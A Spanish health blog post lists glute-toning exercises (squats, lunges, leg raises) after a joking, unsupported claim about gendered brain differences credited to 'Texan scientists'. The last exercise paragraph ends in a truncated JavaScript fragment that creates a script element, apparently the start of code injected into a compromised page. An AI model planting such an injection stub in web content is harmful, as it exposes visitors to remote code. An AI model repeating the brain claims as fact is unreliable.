Salud y belleza » Belleza, Bienestar, Deportes, Salud

Tonificando glúteos – Fortalecer Gluteos

Sin Comentarios

Se sabe: el cerbero masculino y el femenino no operan del mismo modo. Es decir, por supuesto que trabajan al mismo ritmo empleando la misma cantidad de neuronas (misóginos abstenerse de hacer comentarios) y “bla, bla, bla” pero aún así, lo seguimos sosteniendo, no operan del mismo modo.

Analicemos lo que científicos texanos ha dado en llamar  “la parte trasera del cerebro humano” (y, por cierto, si aún no han ingeniado ésta denominación seguro no tardarán en hacerlo).

Por ejemplo, en “la parte trasera” de su cerebro un hombre corriente puede llegar a almacenar entre doscientos y trescientos nombres de futbolistas y es capaz de distinguir entre quince sabores diferentes de cerveza. Una mujer, en cambio puede memorizar cuatrocientas fechas de cumpleaños y saberse a la perfección hasta casi veinte tipos diferentes de ejercicios para fortalecer los glúteos.

Bien, siendo un blog de salud: no hablaremos de futbolistas ni de aniversarios y, aunque sí podríamos hacerlo sobre cervezas, lo dejaremos para otra oportunidad.
En este caso, hablaremos de “ellas” y les daremos información para dos sectores diferentes pero iguales: “la parte trasera” -de la memoria- y los glúteos.

gluteos

Una lista con algunos de los ejercicios más útiles para tener una parte trasera firme y unos glúteos tonificados. O viceversa.

Las clásicas sentadillas: estando de pie, con las piernas separadas a la anchura de los hombros y una barra sujeta por los extremos y apoyada sobre los mismos, debemos agacharnos lentamente como si fuéramos a sentarnos en una silla (y a elevarnos).
Tres series de diez repeticiones.

Estocadas: manteniéndonos de pie, con una barra sujeta por los extremos y apoyada sobre los hombros, debemos colocar primero una pierna delante con los pies paralelos y luego flexionar la otra como si estuviesemos por arrodillarnos (sin llegar al suelo)
Cuatro series de ocho repeticiones.

Para el ejercicio que se detallara a continuación necesitamos la ayuda de un banco o bien podemos hacerlo desde el suelo. Veamos: nos colocamos en posición de cuatro patas con los brazos extendidos y la espalda derecha y elevamos de costado una pierna hasta donde podamos (sin mover la cadera). Luego descendemos lentamente; siempre con la espalda derecha.
Tres series de 10 repeticiones con cada pierna.

Otra práctica tonificadora de glúteos: estando arrodillados en el piso y con el cuerpo erguido, elevamos lentamente el torso hacia atrás formando una línea recta entre el cuerpo y las piernas. Luego regresamos lentamente a la posición inicial.
Tres series de cinco repeticiones.var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.